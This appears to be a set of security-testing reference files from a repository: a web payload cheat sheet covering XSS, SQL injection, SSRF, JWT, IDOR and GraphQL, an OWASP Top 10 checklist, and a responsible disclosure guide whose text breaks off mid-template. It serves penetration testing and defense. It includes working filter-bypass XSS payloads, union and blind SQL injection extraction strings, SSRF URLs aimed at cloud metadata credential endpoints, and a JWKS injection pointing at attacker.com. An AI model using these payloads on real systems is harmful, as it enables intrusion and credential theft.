<input onfocus=alert(document.domain) autofocus>
<marquee onstart=alert(document.domain)>
<details open ontoggle=alert(document.domain)>
```
**Filter bypass payloads:**
```
<ScRiPt>alert(document.domain)</ScRiPt>
<scr<script>ipt>alert(document.domain)</scr</script>ipt>
<script>alert(String.fromCharCode(100,111,99,117,109,101,110,116,46,100,111,109,97,105,110))</script>
<img src=x onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">
<svg/onload=alert(document.domain)>
javascript:alert(document.domain)//
```
**URL encoding payloads:**
```
%3Cscript%3Ealert(document.domain)%3C/script%3E
%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E
```
**Context-specific payloads:**
Inside HTML attribute:
```
" onmouseover="alert(document.domain)
' onfocus='alert(document.domain)' autofocus='
```
Inside JavaScript string:
```
';alert(document.domain);//
\';alert(document.domain);//
</script><script>alert(document.domain)</script>
```
Inside CSS:
```
expression(alert(document.domain))
url(javascript:alert(document.domain))
```
### Stored XSS
Test these in persistent fields: user profiles, comments, forum posts, file upload names, chat messages.
```
<img src=x onerror=alert(document.domain)>
<a href="javascript:alert(document.domain)">click me</a>
<svg><animate onbegin=alert(document.domain) attributeName=x dur=1s>
```
### DOM-Based XSS
Look for JavaScript that reads from these sources and writes to dangerous sinks:
**Sources** (attacker-controlled input):
```
document.location
document.location.hash
document.location.search
document.referrer
window.name
document.cookie
localStorage / sessionStorage
postMessage data
```
**Sinks** (dangerous output):
```
element.innerHTML
element.outerHTML
document.write()
document.writeln()
eval()
setTimeout(string)
setInterval(string)
new Function(string)
element.setAttribute("onclick", ...)
location.href = ...
location.assign(...)
```
**Detection pattern:** Search for any code path where a Source flows into a Sink without sanitization.
---
## SQL Injection Detection Patterns
### Detection Payloads
**Error-based detection:**
```
' -- Single quote triggers SQL error
" -- Double quote
\ -- Backslash
' OR '1'='1 -- Boolean true
' OR '1'='2 -- Boolean false (compare responses)
' AND 1=1-- -- Boolean true with comment
' AND 1=2-- -- Boolean false (compare responses)
1 OR 1=1 -- Numeric injection
1 AND 1=2 -- Numeric false
```
**Union-based enumeration** (authorized testing only):
```sql
-- Step 1: Find column count
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3-- -- Increment until error
' UNION SELECT NULL--
' UNION SELECT NULL,NULL-- -- Match column count
-- Step 2: Find displayable columns
' UNION SELECT 'a',NULL,NULL--
' UNION SELECT NULL,'a',NULL--
-- Step 3: Extract database info
' UNION SELECT version(),NULL,NULL--
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--
```
**Time-based blind injection:**
```sql
-- MySQL
' AND SLEEP(5)--
' AND IF(1=1, SLEEP(5), 0)--
' AND IF(SUBSTRING(version(),1,1)='5', SLEEP(5), 0)--
-- PostgreSQL
' AND pg_sleep(5)--
'; SELECT pg_sleep(5)--
' AND (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)--
-- MSSQL
'; WAITFOR DELAY '0:0:5'--
' AND 1=(SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)--
```
**Boolean-based blind injection:**
```sql
-- Extract data one character at a time
' AND SUBSTRING(username,1,1)='a'--
' AND ASCII(SUBSTRING(username,1,1))>96--
' AND ASCII(SUBSTRING(username,1,1))>109-- -- Binary search
```
### Database-Specific Syntax
| Feature | MySQL | PostgreSQL | MSSQL | SQLite |
|---------|-------|------------|-------|--------|
| String concat | `CONCAT('a','b')` | `'a' \|\| 'b'` | `'a' + 'b'` | `'a' \|\| 'b'` |
| Comment | `-- ` or `#` | `--` | `--` | `--` |
| Version | `VERSION()` | `version()` | `@@version` | `sqlite_version()` |
| Current user | `CURRENT_USER()` | `current_user` | `SYSTEM_USER` | N/A |
| Sleep | `SLEEP(5)` | `pg_sleep(5)` | `WAITFOR DELAY '0:0:5'` | N/A |
---
## SSRF Detection Techniques
### Basic Payloads
```
http://127.0.0.1
http://localhost
http://0.0.0.0
http://[::1] -- IPv6 localhost
http://[0000::1] -- IPv6 localhost (expanded)
```
### Cloud Metadata Endpoints
```
# AWS EC2 Metadata (IMDSv1)
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data
# AWS EC2 Metadata (IMDSv2 — requires token header)
# Step 1: curl -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" -X PUT http://169.254.169.254/latest/api/token
# Step 2: curl -H "X-aws-ec2-metadata-token: TOKEN" http://169.254.169.254/latest/meta-data/
# GCP Metadata
http://metadata.google.internal/computeMetadata/v1/
http://169.254.169.254/computeMetadata/v1/
# Azure Metadata
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token
# DigitalOcean Metadata
http://169.254.169.254/metadata/v1/
```
### Bypass Techniques
**IP encoding tricks:**
```
http://0x7f000001 -- Hex encoding of 127.0.0.1
http://2130706433 -- Decimal encoding of 127.0.0.1
http://0177.0.0.1 -- Octal encoding
http://127.1 -- Shortened
http://127.0.0.1.nip.io -- DNS rebinding via nip.io
```
**URL parsing inconsistencies:**
```
http://127.0.0.1@evil.com -- URL authority confusion
http://evil.com#@127.0.0.1 -- Fragment confusion
http://127.0.0.1%00@evil.com -- Null byte injection
http://evil.com\@127.0.0.1 -- Backslash confusion
```
**Redirect chains:**
```
# If the app follows redirects, find an open redirect first:
https://target.com/redirect?url=http://169.254.169.254/
```
---
## JWT Manipulation Patterns
### Decode Without Verification
JWTs are Base64URL-encoded and can be decoded without the secret:
```bash
# Decode header
echo "eyJhbGciOiJIUzI1NiJ9" | base64 -d
# Output: {"alg":"HS256"}
# Decode payload
echo "eyJ1c2VyIjoiYWRtaW4ifQ" | base64 -d
# Output: {"user":"admin"}
```
### Algorithm Confusion Attacks
**None algorithm attack:**
```json
// Original header
{"alg": "HS256", "typ": "JWT"}
// Modified header — set algorithm to none
{"alg": "none", "typ": "JWT"}
// Token format: header.payload. (empty signature)
```
**RS256 to HS256 confusion:**
If the server uses RS256 (asymmetric), try:
1. Get the server's RSA public key (from JWKS endpoint or TLS certificate)
2. Change `alg` to `HS256`
3. Sign the token using the RSA public key as the HMAC secret
4. If the server naively uses the configured key for both algorithms, it will verify the HMAC with the public key
### Claim Manipulation
```json
// Common claims to modify:
{
"sub": "1234567890", // Change to another user's ID
"role": "admin", // Escalate from "user" to "admin"
"is_admin": true, // Toggle admin flag
"exp": 9999999999, // Extend expiration far into the future
"aud": "admin-api", // Change audience
"iss": "trusted-issuer" // Spoof issuer
}
```
### Weak Secret Brute Force
Common JWT secrets to try (if you have a valid token to test against):
```
secret
password
123456
your-256-bit-secret
jwt_secret
changeme
mysecretkey
HS256-secret
```
Use tools like `jwt-cracker` or `hashcat -m 16500` for dictionary attacks.
### JWKS Injection
If the server fetches keys from a JWKS URL in the JWT header:
```json
{
"alg": "RS256",
"jku": "https://attacker.com/.well-known/jwks.json"
}
```
Host your own JWKS with a key pair you control.
---
## API Authorization Testing (IDOR, BOLA)
### IDOR Testing Methodology
**Step 1: Identify resource identifiers**
Map all API endpoints and find parameters that reference resources:
```
GET /api/users/{id}/profile
GET /api/orders/{orderId}
GET /api/documents/{docId}/download
PUT /api/users/{id}/settings
DELETE /api/comments/{commentId}
```
**Step 2: Create two test accounts**
- User A (attacker) and User B (victim)
- Authenticate as both and capture their tokens
**Step 3: Cross-account access testing**
Using User A's token, request User B's resources:
```
# Read
GET /api/users/{B_id}/profile → Should be 403
GET /api/orders/{B_orderId} → Should be 403
# Write
PUT /api/users/{B_id}/settings → Should be 403
PATCH /api/orders/{B_orderId} → Should be 403
# Delete
DELETE /api/comments/{B_commentId} → Should be 403
```
**Step 4: ID manipulation**
```
# Sequential IDs — increment/decrement
/api/users/100 → /api/users/101
# UUID prediction — not practical, but test for leaked UUIDs
# Check if UUIDs appear in other responses
# Encoded IDs — decode and modify
/api/users/MTAw → base64 decode = "100" → encode "101" = MTAx
# Hash-based IDs — check for predictable hashing
/api/users/md5(email) → compute md5 of known emails
```
### BFLA (Broken Function Level Authorization)
Test access to administrative functions:
```
# As regular user, try admin endpoints:
POST /api/admin/users → 403
DELETE /api/admin/users/123 → 403
PUT /api/admin/settings → 403
GET /api/admin/reports → 403
POST /api/admin/impersonate/user123 → 403
# Try HTTP method override:
GET /api/admin/users with X-HTTP-Method-Override: DELETE
POST /api/admin/users with _method=DELETE
```
### Mass Assignment Testing
```json
// Normal user update request:
PUT /api/users/profile
{
"name": "Normal User",
"email": "user@test.com"
}
// Mass assignment attempt — add privileged fields:
PUT /api/users/profile
{
"name": "Normal User",
"email": "user@test.com",
"role": "admin",
"is_verified": true,
"is_admin": true,
"balance": 99999,
"subscription": "enterprise",
"permissions": ["admin", "superadmin"]
}
// Then check if any extra fields were persisted:
GET /api/users/profile
```
---
## GraphQL Security Testing Patterns
### Introspection Query
Use this to map the entire schema (should be disabled in production):
```graphql
{
__schema {
queryType { name }
mutationType { name }
types {
name
kind
fields {
name
type {
name
kind
ofType { name kind }
}
args { name type { name } }
}
}
}
}
```
### Query Depth Attack
Nested queries can cause exponential resource consumption:
```graphql
{
users {
friends {
friends {
friends {
friends {
friends {
friends {
name
}
}
}
}
}
}
}
}
```
**Mitigation check:** Server should return an error like "Query depth exceeds maximum allowed depth."
### Query Complexity Attack
Wide queries with aliases:
```graphql
{
a: users(limit: 1000) { name email }
b: users(limit: 1000) { name email }
c: users(limit: 1000) { name email }
d: users(limit: 1000) { name email }
e: users(limit: 1000) { name email }
}
```
### Batch Query Attack
Send multiple operations in a single request to bypass rate limiting:
```json
[
{"query": "mutation { login(user:\"admin\", pass:\"pass1\") { token } }"},
{"query": "mutation { login(user:\"admin\", pass:\"pass2\") { token } }"},
{"query": "mutation { login(user:\"admin\", pass:\"pass3\") { token } }"},
{"query": "mutation { login(user:\"admin\", pass:\"pass4\") { token } }"},
{"query": "mutation { login(user:\"admin\", pass:\"pass5\") { token } }"}
]
```
### Field Suggestion Exploitation
GraphQL often suggests similar field names on typos:
```graphql
{ users { passwor } }
# Response: "Did you mean 'password'?"
```
Use this to discover hidden fields without full introspection.
### Authorization Bypass via Fragments
```graphql
query {
publicUser(id: 1) {
name
...on User {
email # Should be restricted
ssn # Should be restricted
creditCard # Should be restricted
}
}
}
```
---
## Rate Limiting Bypass Techniques
These techniques help verify that rate limiting is robust during authorized testing:
```
# IP rotation — test if rate limiting is per-IP only
X-Forwarded-For: 1.2.3.4
X-Real-IP: 1.2.3.4
X-Originating-IP: 1.2.3.4
# Case variation — test if endpoints are case-sensitive
/api/login
/API/LOGIN
/Api/Login
# Path variation
/api/login
/api/login/
/api/./login
/api/login?dummy=1
# HTTP method variation
POST /api/login
PUT /api/login
# Unicode encoding
/api/logi%6E
```
If any of these bypass rate limiting, the implementation needs hardening.

View File

@@ -0,0 +1,440 @@
# OWASP Top 10 (2021) — Detailed Security Checklist
Comprehensive reference for each OWASP Top 10 category with descriptions, test procedures, code patterns to detect, remediation steps, and CVSS scoring guidance.
---
## A01:2021 — Broken Access Control
**CWEs Covered:** CWE-200, CWE-201, CWE-352, CWE-639, CWE-862, CWE-863
### Description
Access control enforces policy so users cannot act outside their intended permissions. Failures typically lead to unauthorized disclosure, modification, or destruction of data, or performing business functions outside the user's limits.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Horizontal privilege escalation | Change user ID in API requests (`/users/123` to `/users/124`) | 403 Forbidden |
| 2 | Vertical privilege escalation | Access admin endpoints with regular user token | 403 Forbidden |
| 3 | CORS validation | Send request with `Origin: https://evil.com` | `Access-Control-Allow-Origin` must not reflect arbitrary origins |
| 4 | Forced browsing | Request `/admin`, `/debug`, `/api/internal`, `/.env`, `/swagger.json` | 403 or 404 |
| 5 | Method-based bypass | Try POST instead of GET, or PUT instead of PATCH | Authorization checks apply regardless of HTTP method |
| 6 | JWT claim manipulation | Modify `role`, `is_admin`, `user_id` claims, re-sign with weak secret | 401 Unauthorized |
| 7 | Path traversal in authorization | Request `/api/users/../admin/settings` | Canonical path check must reject traversal |
| 8 | API endpoint enumeration | Fuzz API paths with wordlists | Only documented endpoints should respond |
### Code Patterns to Detect
```python
# BAD: No authorization check on resource access
@app.route("/api/documents/<doc_id>")
def get_document(doc_id):
return Document.query.get(doc_id).to_json() # No ownership check!
# GOOD: Verify ownership
@app.route("/api/documents/<doc_id>")
@login_required
def get_document(doc_id):
doc = Document.query.get_or_404(doc_id)
if doc.owner_id != current_user.id:
abort(403)
return doc.to_json()
```
```javascript
// BAD: Client-side only access control
{isAdmin && <AdminPanel />} // Hidden but still accessible via API
// GOOD: Server-side middleware
app.use('/admin/*', requireRole('admin'));
```
### Remediation
1. Deny by default — require explicit authorization for every endpoint
2. Implement server-side access control, never rely on client-side checks
3. Use UUIDs instead of sequential IDs for resource identifiers
4. Log and alert on access control failures
5. Rate limit API requests to minimize automated enumeration
6. Avoid permissive CORS — restrict `Access-Control-Allow-Origin` to an explicit allowlist of trusted origins, and never reflect arbitrary request origins
7. Invalidate server-side sessions on logout
### CVSS Scoring Guidance
- **Horizontal escalation (read):** CVSS 6.5 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
- **Horizontal escalation (write):** CVSS 8.1 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
- **Vertical escalation to admin:** CVSS 8.8 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- **Unauthenticated admin access:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
---
## A02:2021 — Cryptographic Failures
**CWEs Covered:** CWE-259, CWE-327, CWE-328, CWE-330, CWE-331
### Description
Failures related to cryptography that often lead to sensitive data exposure. This includes using weak algorithms, improper key management, and transmitting data in cleartext.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | TLS version | `nmap --script ssl-enum-ciphers -p 443 target` | Only TLS 1.2+ accepted |
| 2 | Certificate validity | `openssl s_client -connect target:443` | Valid cert, not self-signed |
| 3 | HSTS header | Check response headers | `Strict-Transport-Security: max-age=31536000` |
| 4 | Password storage | Review auth code | bcrypt (cost >= 12), scrypt, or argon2 |
| 5 | Sensitive data in URLs | Review access logs | No tokens, passwords, or PII in query params |
| 6 | Encryption at rest | Check database/storage config | Sensitive fields encrypted (AES-256-GCM) |
| 7 | Key management | Review key storage | Keys in secrets manager, not in code/env files |
| 8 | Random number generation | Review token generation code | Uses crypto-grade PRNG (secrets module, crypto.randomBytes) |
### Code Patterns to Detect
```python
# BAD: MD5 for password hashing
password_hash = hashlib.md5(password.encode()).hexdigest()
# BAD: Hardcoded encryption key
cipher = AES.new(b"mysecretkey12345", AES.MODE_GCM)
# BAD: Weak random for tokens
token = str(random.randint(100000, 999999))
# GOOD: bcrypt for passwords
password_hash = bcrypt.hashpw(password.encode(), bcrypt.gensalt(rounds=12))
# GOOD: Secrets module for tokens
token = secrets.token_urlsafe(32)
```
### Remediation
1. Use TLS 1.2+ for all data in transit; redirect HTTP to HTTPS
2. Use bcrypt (cost 12+), scrypt, or argon2id for password hashing
3. Use AES-256-GCM for encryption at rest
4. Store keys in a secrets manager (Vault, AWS Secrets Manager, GCP Secret Manager)
5. Use `secrets` (Python) or `crypto.randomBytes` (Node.js) for token generation
6. Enable HSTS with preload
7. Never store sensitive data in URLs or logs
### CVSS Scoring Guidance
- **Cleartext transmission of passwords:** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Weak password hashing (MD5):** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Hardcoded encryption key:** CVSS 7.2 — AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
---
## A03:2021 — Injection
**CWEs Covered:** CWE-20, CWE-74, CWE-75, CWE-77, CWE-78, CWE-79, CWE-89
### Description
Injection flaws occur when untrusted data is sent to an interpreter as part of a command or query. Includes SQL, NoSQL, OS command, LDAP, XPath, and template injection.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | SQL injection | Submit `' OR 1=1--` in input fields | No data leakage, proper error handling |
| 2 | Blind SQL injection | Submit `' AND SLEEP(5)--` | No 5-second delay in response |
| 3 | NoSQL injection | Submit `{"$gt":""}` in JSON fields | No data leakage |
| 4 | XSS (reflected) | Submit `<script>alert(1)</script>` | Input is escaped/encoded in response |
| 5 | XSS (stored) | Submit payload in persistent fields | Payload is sanitized before storage |
| 6 | Command injection | Submit `; whoami` in fields | No command execution |
| 7 | Template injection | Submit `{{7*7}}` | No "49" in response |
| 8 | LDAP injection | Submit `*)(uid=*))(|(uid=*` | No directory enumeration |
### Code Patterns to Detect
```python
# BAD: String concatenation in SQL
cursor.execute("SELECT * FROM users WHERE email = '" + email + "'")
cursor.execute(f"SELECT * FROM users WHERE email = '{email}'")
# GOOD: Parameterized query
cursor.execute("SELECT * FROM users WHERE email = %s", (email,))
```
```javascript
// BAD: Template literal in SQL
db.query(`SELECT * FROM users WHERE id = ${userId}`);
// GOOD: Parameterized query
db.query('SELECT * FROM users WHERE id = $1', [userId]);
```
### Remediation
1. Use parameterized queries / prepared statements for ALL database operations
2. Use ORM methods with bound parameters (not raw queries)
3. Validate and sanitize all input on the server side
4. Use Content-Security-Policy to mitigate XSS impact
5. Escape output based on context (HTML, JS, URL, CSS)
6. Never pass user input to eval(), exec(), os.system(), or child_process
7. Use allowlists for expected input formats
### CVSS Scoring Guidance
- **SQL injection (unauthenticated):** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **Stored XSS:** CVSS 7.1 — AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
- **Reflected XSS:** CVSS 6.1 — AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- **Command injection:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
---
## A04:2021 — Insecure Design
**CWEs Covered:** CWE-209, CWE-256, CWE-501, CWE-522
### Description
Insecure design represents weaknesses in the design and architecture of the application, distinct from implementation bugs. This includes missing or ineffective security controls.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Rate limiting | Send 100 rapid requests to login | 429 after threshold (5-10 attempts) |
| 2 | Business logic abuse | Submit negative quantities, skip payment | All calculations server-side |
| 3 | Account lockout | 10+ failed login attempts | Account locked or CAPTCHA triggered |
| 4 | Multi-step flow bypass | Skip steps via direct URL access | Server validates state at each step |
| 5 | Password reset abuse | Request multiple reset tokens | Previous tokens invalidated |
### Remediation
1. Use threat modeling during design phase (STRIDE, PASTA)
2. Implement rate limiting on all sensitive endpoints
3. Validate business logic on the server, never trust client calculations
4. Use state machines for multi-step workflows
5. Implement CAPTCHA for public-facing forms after threshold
### CVSS Scoring Guidance
- **Missing rate limit on auth:** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Business logic bypass (financial):** CVSS 8.1 — AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
---
## A05:2021 — Security Misconfiguration
**CWEs Covered:** CWE-2, CWE-11, CWE-13, CWE-15, CWE-16, CWE-388
### Description
The application is improperly configured, with default settings, unnecessary features enabled, verbose error messages, or missing security hardening.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Default credentials | Try admin:admin, root:root | Rejected |
| 2 | Debug mode | Trigger application errors | No stack traces in response |
| 3 | Security headers | Check response headers | CSP, X-Frame-Options, XCTO, HSTS present |
| 4 | HTTP methods | Send OPTIONS request | Only required methods allowed |
| 5 | Directory listing | Request directory without index | Listing disabled (403 or redirect) |
| 6 | Server version disclosure | Check Server and X-Powered-By headers | Version info removed |
| 7 | Error messages | Submit invalid data | Generic error messages, no internal details |
### Remediation
1. Disable debug mode in production
2. Remove default credentials and accounts
3. Add all security headers (CSP, HSTS, X-Frame-Options, XCTO, Referrer-Policy)
4. Remove Server and X-Powered-By headers
5. Disable directory listing
6. Implement generic error pages
### CVSS Scoring Guidance
- **Debug mode in production:** CVSS 5.3 — AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- **Default admin credentials:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **Missing security headers:** CVSS 4.3 — AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
---
## A06:2021 — Vulnerable and Outdated Components
**CWEs Covered:** CWE-1035, CWE-1104
### Description
Components (libraries, frameworks, software modules) with known vulnerabilities that can undermine application defenses.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | npm audit | `npm audit --json` | No critical or high vulnerabilities |
| 2 | pip audit | `pip audit --desc` | No known CVEs |
| 3 | Go vulncheck | `govulncheck ./...` | No reachable vulnerabilities |
| 4 | EOL check | Compare framework versions to vendor EOL dates | No EOL components |
| 5 | License audit | Check dependency licenses | No copyleft licenses in proprietary code |
### Remediation
1. Run dependency audits in CI/CD (block merges on critical/high)
2. Set up automated dependency update PRs (Dependabot, Renovate)
3. Pin dependency versions in lock files
4. Remove unused dependencies
5. Subscribe to security advisories for key dependencies
### CVSS Scoring Guidance
Inherit the CVSS score from the upstream CVE. Add environmental metrics based on reachability.
---
## A07:2021 — Identification and Authentication Failures
**CWEs Covered:** CWE-255, CWE-259, CWE-287, CWE-288, CWE-384, CWE-798
### Description
Weaknesses in authentication mechanisms that allow attackers to compromise passwords, keys, session tokens, or exploit implementation flaws to assume other users' identities.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Brute force | 100 rapid login attempts | Account lockout or exponential backoff |
| 2 | Session cookie flags | Inspect cookies in browser | HttpOnly, Secure, SameSite set |
| 3 | Session invalidation | Logout, replay session cookie | 401 Unauthorized |
| 4 | Username enumeration | Submit valid/invalid usernames | Identical error messages |
| 5 | Password policy | Submit "12345" as password | Rejected (min 8 chars, complexity) |
| 6 | Password reset token | Request reset, check token expiry | Token expires in 15-60 minutes |
| 7 | MFA bypass | Skip MFA step via direct API call | Requires MFA completion |
### Remediation
1. Implement multi-factor authentication
2. Set session cookies with HttpOnly, Secure, SameSite=Strict
3. Invalidate sessions on logout and password change
4. Use generic error messages ("Invalid credentials" not "User not found")
5. Enforce strong password policy (NIST SP 800-63B)
6. Expire password reset tokens within 15-60 minutes
### CVSS Scoring Guidance
- **Authentication bypass:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **Session fixation:** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Username enumeration:** CVSS 5.3 — AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
---
## A08:2021 — Software and Data Integrity Failures
**CWEs Covered:** CWE-345, CWE-353, CWE-426, CWE-494, CWE-502, CWE-565, CWE-829
### Description
Code and infrastructure that does not protect against integrity violations, including unsafe deserialization, unsigned updates, and CI/CD pipeline manipulation.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Unsafe deserialization | Send crafted serialized objects | Rejected or safely handled |
| 2 | SRI on CDN resources | Check script/link tags | Integrity attribute present |
| 3 | CI/CD pipeline | Review pipeline config | Signed commits, protected branches |
| 4 | Update integrity | Check update mechanism | Signed artifacts, hash verification |
### Remediation
1. Use `yaml.safe_load()` instead of `yaml.load()`
2. Avoid `pickle.loads()` on untrusted data
3. Add SRI hashes to all CDN-loaded scripts
4. Sign all deployment artifacts
5. Protect CI/CD pipeline with branch protection and signed commits
### CVSS Scoring Guidance
- **Unsafe deserialization (RCE):** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **Missing SRI on CDN scripts:** CVSS 6.1 — AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
---
## A09:2021 — Security Logging and Monitoring Failures
**CWEs Covered:** CWE-117, CWE-223, CWE-532, CWE-778
### Description
Without sufficient logging and monitoring, breaches cannot be detected. Logging too little means missed attacks; logging too much (sensitive data) creates new risks.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Auth event logging | Attempt valid/invalid logins | Both logged with timestamp and IP |
| 2 | Sensitive data in logs | Review log output | No passwords, tokens, PII, credit cards |
| 3 | Alert thresholds | Trigger 50 failed logins | Alert generated |
| 4 | Log integrity | Check log storage | Append-only or integrity-protected storage |
| 5 | Admin action audit trail | Perform admin actions | All actions logged with user identity |
### Remediation
1. Log all authentication events (success and failure)
2. Sanitize logs — strip passwords, tokens, PII before writing
3. Set up alerting on anomalous patterns (SIEM integration)
4. Use append-only log storage (CloudWatch, Splunk, immutable S3)
5. Maintain audit trail for all admin and data-modifying actions
### CVSS Scoring Guidance
Logging failures are typically scored as contributing factors rather than standalone vulnerabilities. When combined with other findings, they increase the overall risk level.
---
## A10:2021 — Server-Side Request Forgery (SSRF)
**CWEs Covered:** CWE-918
### Description
SSRF occurs when a web application fetches a remote resource without validating the user-supplied URL, allowing attackers to reach internal services, cloud metadata endpoints, or other protected resources.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Internal IP access | Submit `http://127.0.0.1` in URL fields | Request blocked |
| 2 | Cloud metadata | Submit `http://169.254.169.254/latest/meta-data/` | Request blocked |
| 3 | IPv6 localhost | Submit `http://[::1]` | Request blocked |
| 4 | DNS rebinding | Use DNS rebinding service | Request blocked after resolution |
| 5 | URL encoding bypass | Submit `http://0x7f000001` (hex localhost) | Request blocked |
| 6 | Open redirect chain | Find open redirect, chain to internal URL | Request blocked |
### Code Patterns to Detect
```python
# BAD: User-controlled URL without validation
url = request.args.get("url")
response = requests.get(url) # SSRF!
# GOOD: URL allowlist validation
ALLOWED_HOSTS = {"api.example.com", "cdn.example.com"}
parsed = urlparse(url)
if parsed.hostname not in ALLOWED_HOSTS:
abort(403, "URL not in allowlist")
response = requests.get(url)
```
### Remediation
1. Validate and allowlist outbound URLs (domain, scheme, port)
2. Block requests to private IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 127.0.0.0/8, 169.254.0.0/16)
3. Block requests to cloud metadata endpoints
4. Use a dedicated egress proxy for outbound requests
5. Disable unnecessary URL-fetching features
6. Resolve DNS and validate the IP address before making the request
### CVSS Scoring Guidance
- **SSRF to cloud metadata (credential theft):** CVSS 9.1 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
- **SSRF to internal service (read):** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Blind SSRF (no response data):** CVSS 5.3 — AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

View File

@@ -0,0 +1,317 @@
# Responsible Disclosure Guide
A complete guide for responsibly reporting security vulnerabilities found during authorized testing or independent security research.
---
## Disclosure Timeline Templates
### Standard 90-Day Disclosure
The industry-standard timeline used by Google Project Zero, CERT/CC, and most security researchers.
| Day | Action | Owner |
|-----|--------|-------|
| 0 | Discover vulnerability, document with evidence | Researcher |
| 1 | Submit initial report to vendor security contact | Researcher |
| 3 | Confirm report received (if no auto-acknowledgment) | Researcher |
| 7 | Follow up if no acknowledgment received | Researcher |
| 7 | Acknowledge receipt, assign tracking ID | Vendor |
| 14 | Provide initial severity assessment and timeline | Vendor |
| 30 | First status update on remediation progress | Vendor |
| 30 | Request update if none provided | Researcher |
| 60 | Second status update; fix should be in development | Vendor |
| 60 | Offer technical assistance if fix is delayed | Researcher |
| 90 | Public disclosure deadline (with or without fix) | Researcher |
| 90+ | Coordinate joint disclosure statement if fix is ready | Both |
### Accelerated 30-Day Disclosure
For actively exploited vulnerabilities or critical severity (CVSS 9.0+):
| Day | Action |
|-----|--------|
| 0 | Discover, document, report immediately |
| 1 | Vendor acknowledges |
| 7 | Vendor provides remediation timeline |
| 14 | Status update; patch expected |
| 30 | Public disclosure |
### Extended 120-Day Disclosure
For complex vulnerabilities requiring architectural changes:
| Day | Action |
|-----|--------|
| 0 | Report submitted |
| 14 | Vendor acknowledges, confirms complexity |
| 30 | Vendor provides detailed remediation plan |
| 60 | Status update, partial fix may be deployed |
| 90 | Near-complete remediation expected |
| 120 | Full disclosure |
**When to extend:** Only if the vendor is actively working on a fix and communicating progress. A vendor that goes silent does not earn extra time.
---
## Communication Templates
### Initial Vulnerability Report
```
Subject: Security Vulnerability Report — [Brief Title]
To: security@[vendor].com
Dear Security Team,
I am writing to report a security vulnerability I discovered in [Product/Service Name].
## Summary
- **Vulnerability Type:** [e.g., SQL Injection, SSRF, Authentication Bypass]
- **Severity:** [Critical/High/Medium/Low] (CVSS: X.X)
- **Affected Component:** [e.g., /api/login endpoint, User Profile page]
- **Discovery Date:** [YYYY-MM-DD]
## Description
[Clear, technical description of the vulnerability — what it is, where it exists, and why it matters.]
## Steps to Reproduce
1. [Step 1]
2. [Step 2]
3. [Step 3]
## Evidence
[Screenshots, request/response pairs, or proof-of-concept code. Non-destructive only.]
## Impact
[What an attacker could achieve by exploiting this vulnerability.]
## Suggested Remediation
[Your recommendation for fixing the issue.]
## Disclosure Timeline
I follow a [90-day] responsible disclosure policy. I plan to publicly disclose this finding on [DATE] unless we agree on an alternative timeline.
## Researcher Information
- Name: [Your Name]
- Organization: [Your Organization, if applicable]
- Contact: [Your Email]
- PGP Key: [Fingerprint or link to public key]
I have not accessed any user data, modified any systems, or shared this information with anyone else. I am happy to provide additional details or assist with remediation.
Best regards,
[Your Name]
```
### Follow-Up (No Response After 7 Days)
```
Subject: Re: Security Vulnerability Report — [Brief Title] (Follow-Up)
